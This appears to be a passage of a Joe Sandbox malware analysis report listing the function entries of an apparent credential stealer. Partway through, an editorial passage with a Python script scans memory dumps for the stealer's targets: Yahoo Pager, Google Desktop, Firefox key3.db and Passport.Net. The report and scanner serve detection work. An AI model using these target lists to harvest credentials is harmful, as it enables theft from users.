                          • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                          • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                          • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                          APIs
                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                            • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                            • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                          • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                            • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                            • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                            • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                            • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                          • SetCursor.USER32 ref: 0040B9F9
                          • SetFocus.USER32(?), ref: 0040BA0B
                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                          • String ID:
                          • API String ID: 2374668499-0
                          • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                          • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                          • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                          • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: b4bc8ea3596b91dfe4b466af9048751b201f61ada43734c3eff6748fa3cff06f
                          • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                          • Opcode Fuzzy Hash: b4bc8ea3596b91dfe4b466af9048751b201f61ada43734c3eff6748fa3cff06f
                          • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                          APIs
                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                          • ??3@YAXPAX@Z.MSVCRT ref: 00409AB3
                          • ??3@YAXPAX@Z.MSVCRT ref: 00409AC6
                          • ??3@YAXPAX@Z.MSVCRT ref: 00409AD9
                          • ??3@YAXPAX@Z.MSVCRT ref: 00409AEC
                          • ??3@YAXPAX@Z.MSVCRT ref: 00409B00
                            • Part of subcall function 00407A55: ??3@YAXPAX@Z.MSVCRT ref: 00407A5C
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 71fd03afa15095c2d0ce6bd683e65a22e38aca543c51e447af1f15dc64016add
                          • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                          • Opcode Fuzzy Hash: 71fd03afa15095c2d0ce6bd683e65a22e38aca543c51e447af1f15dc64016add
                          • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                          APIs
                            • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                            • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                            • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                          • SetBkMode.GDI32(?,00000001), ref: 0041079E
                          • GetSysColor.USER32(00000005), ref: 004107A6
                          • SetBkColor.GDI32(?,00000000), ref: 004107B0
                          • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                          • GetSysColorBrush.USER32(00000005), ref: 004107C6
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                          • String ID:
                          • API String ID: 2775283111-0
                          • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                          • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                          • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                          • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: winSeekFile$winTruncate1$winTruncate2
                          • API String ID: 885266447-2471937615
                          • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                          • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                          • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                          • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                          APIs
                            • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                          • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                          • CloseHandle.KERNEL32(?), ref: 00406B11
                            • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT ref: 00407909
                            • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                            • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$??2@??3@CloseCreateHandleReadSize
                          • String ID: Ul@$key3.db
                          • API String ID: 1968906679-1563549157
                          • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                          • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                          • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                          • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _strcmpi$_mbscpy
                          • String ID: smtp
                          • API String ID: 2625860049-60245459
                          • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                          • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                          • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                          • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                          APIs
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                          • memset.MSVCRT ref: 00408258
                            • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                          Strings
                          • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Close$EnumOpenmemset
                          • String ID: Software\Google\Google Desktop\Mailboxes
                          • API String ID: 2255314230-2212045309
                          • Opcode ID: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                          • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                          • Opcode Fuzzy Hash: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                          • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
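The function entries above together sketch a credential-harvesting module: a registry read of Software\Yahoo\Pager / "Yahoo! User ID" (RegOpenKeyExA is called with samDesired 0x20019, which is KEY_READ), enumeration of Software\Google\Google Desktop\Mailboxes, a file read of key3.db (the Firefox NSS key database), a "Personalities" INI section walk, an _strcmpi against "smtp", and a dynamically resolved call whose only string is Passport.Net\* (consistent with a CredEnumerate filter, though the report does not name the resolved API). The script below is an added example by the editor, not code from the report or from Remcos: it scans a raw memory dump for exactly those String IDs and issues a verdict. The store labels, the high/low confidence split and the constructed sample dump are assumptions made for the example; the indicator bytes themselves are copied from the entries.

```python
# Added example (editor's own code, not part of the Joe Sandbox report or of
# Remcos): scan a raw process memory dump for the credential-store strings
# listed in the function entries above and classify the result.
import re
from typing import Dict, List, Tuple

# Indicator strings are copied from the "String ID" fields above. The labels
# and the high/low confidence split are assumptions made for this example:
# "high" = a registry path or file name specific to one credential store,
# "low"  = a common word that only matters next to a high-confidence hit.
INDICATORS: Dict[str, Tuple[str, List[bytes]]] = {
    "yahoo_messenger":          ("high", [b"Software\\Yahoo\\Pager",
                                          b"Yahoo! User ID",
                                          b"EOptions string"]),
    "google_desktop_mailboxes": ("high", [b"Software\\Google\\Google Desktop\\Mailboxes"]),
    "firefox_nss_keydb":        ("high", [b"key3.db"]),
    "windows_credman_passport": ("high", [b"Passport.Net\\*"]),
    "ini_personalities":        ("low",  [b"Personalities"]),
    "mail_smtp_account":        ("low",  [b"smtp"]),
}


def _encodings(s: bytes):
    """Yield (regex, name) for the ASCII form and the UTF-16LE form of s.

    This sample uses the ANSI APIs (RegOpenKeyExA, GetPrivateProfileSectionA),
    so ASCII is what appears here, but other builds use the W variants."""
    yield re.compile(re.escape(s)), "ascii"
    yield re.compile(re.escape(s.decode("latin-1").encode("utf-16-le"))), "utf16"


def scan_dump(data: bytes) -> Dict[str, List[dict]]:
    """Return {label: [ {string, offset, encoding}, ... ]} for every hit."""
    hits: Dict[str, List[dict]] = {}
    for label, (_conf, strings) in INDICATORS.items():
        found = []
        for s in strings:
            for rx, enc in _encodings(s):
                for m in rx.finditer(data):
                    found.append({"string": s.decode("ascii"),
                                  "offset": m.start(),
                                  "encoding": enc})
        if found:
            hits[label] = sorted(found, key=lambda h: h["offset"])
    return hits


def classify(hits: Dict[str, List[dict]]) -> str:
    """Verdict based only on high-confidence stores.

    A single store can be a legitimate client or a password-recovery tool
    reading its own data; several unrelated vendors' stores in one image is
    the stealer pattern this report shows."""
    high = [lbl for lbl in hits if INDICATORS[lbl][0] == "high"]
    if len(high) >= 2:
        return "multi-store credential stealer"
    if len(high) == 1:
        return "single credential-store access"
    return "no credential-store indicators"


def build_sample_dump() -> bytes:
    """Constructed stand-in for a dumped image: a fake PE header, padding and
    the indicator strings, one of them in UTF-16LE to exercise that path."""
    pieces = [
        b"MZ" + b"\x90" * 62,
        b"Software\\Yahoo\\Pager\x00", b"Yahoo! User ID\x00",
        b"\x00" * 16,
        b"key3.db\x00",
        "Passport.Net\\*".encode("utf-16-le") + b"\x00\x00",
        b"Software\\Google\\Google Desktop\\Mailboxes\x00",
        b"smtp\x00",
    ]
    return b"".join(pieces)


if __name__ == "__main__":
    result = scan_dump(build_sample_dump())
    for label, entries in result.items():
        print(label, [(e["offset"], e["encoding"]) for e in entries])
    print(classify(result))
```

Run it against a real dump with `scan_dump(open(path, "rb").read())`. The verdict deliberately ignores the low-confidence strings on their own: "Personalities" and "smtp" occur in plenty of benign images, and even a single high-confidence path is what the corresponding client itself contains. The signal in this sample is the combination of Yahoo, Google Desktop, Firefox and Windows credential stores inside one injected image, which no legitimate client has a reason to touch together.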
                          APIs
                          • memset.MSVCRT ref: 0040C28C
                          • SetFocus.USER32(?), ref: 0040C314
                            • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FocusMessagePostmemset
                          • String ID: S_@$l
                          • API String ID: 3436799508-4018740455
                          • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                          • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                          • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                          • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                          APIs
                          • memset.MSVCRT ref: 004092C0
                          • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                          • _mbscpy.MSVCRT ref: 004092FC
                          Strings
                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfileString_mbscpymemset
                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                          • API String ID: 408644273-3424043681
                          • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                          • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                          • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                          • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscpy
                          • String ID: C^@$X$ini
                          • API String ID: 714388716-917056472
                          • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                          • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                          • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                          • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                          APIs
                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                          • String ID: MS Sans Serif
                          • API String ID: 3492281209-168460110
                          • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                          • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                          • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                          • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ClassName_strcmpimemset
                          • String ID: edit
                          • API String ID: 275601554-2167791130
                          • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                          • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                          • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                          • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: strlen$_mbscat
                          • String ID: 3CD
                          • API String ID: 3951308622-1938365332
                          • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                          • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                          • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                          • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: rows deleted
                          • API String ID: 2221118986-571615504
                          • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                          • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                          • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                          • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$memset
                          • String ID:
                          • API String ID: 1860491036-0
                          • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                          • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                          • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                          • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$memcpy
                          • String ID:
                          • API String ID: 368790112-0
                          • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                          • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                          • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                          • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$memcpy
                          • String ID:
                          • API String ID: 368790112-0
                          • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                          • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                          • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                          • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                          APIs
                          • __allrem.LIBCMT ref: 00425850
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                          • __allrem.LIBCMT ref: 00425933
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 1992179935-0
                          • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                          • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                          • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                          • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                          APIs
                          Strings
                          • too many SQL variables, xrefs: 0042C6FD
                          • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                          • API String ID: 2221118986-515162456
                          • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                          • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                          • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                          • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                          APIs
                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                          • memset.MSVCRT ref: 004026AD
                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                            • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                            • Part of subcall function 004108E5: CoTaskMemFree.OLE32(00000000), ref: 00410970
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                          • LocalFree.KERNEL32(?), ref: 004027A6
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                          • String ID:
                          • API String ID: 3503910906-0
                          • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                          • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                          • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                          • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                          APIs
                          • memset.MSVCRT ref: 0040C922
                          • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                          • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                          • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Message$MenuPostSendStringmemset
                          • String ID:
                          • API String ID: 3798638045-0
                          • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                          • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                          • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                          • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                          APIs
                            • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                            • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                          • strlen.MSVCRT ref: 0040B60B
                          • atoi.MSVCRT ref: 0040B619
                          • _mbsicmp.MSVCRT ref: 0040B66C
                          • _mbsicmp.MSVCRT ref: 0040B67F
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbsicmp$??2@??3@atoistrlen
                          • String ID:
                          • API String ID: 4107816708-0
                          • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
